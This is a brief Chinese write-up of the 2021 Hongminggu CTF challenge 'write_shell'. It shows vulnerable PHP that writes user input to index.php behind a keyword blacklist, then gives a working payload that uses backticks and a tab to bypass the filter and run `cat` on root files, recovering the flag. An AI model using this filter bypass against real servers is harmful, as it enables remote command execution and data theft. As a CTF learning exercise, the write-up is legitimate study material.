# [红明谷 CTF 2021] write_shell
今天是考试日,但是还是得刷一题(虽然是签到题)
代码如下:
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
}
?>
两个参数:action 和 data,第一个是用来确定方法,pwd 获取 upload 得文件的路径(dir: 显示目录的文件和子目录的列表),upload 上传文件的内容,写入文件中,
# 过滤很多,但是没有过滤反引号 ``,空格可以用 \t 过滤
直接获取:
?action=upload&data==`cat\t/*`?>
在 pwd 的路径上访问,发现显示 flag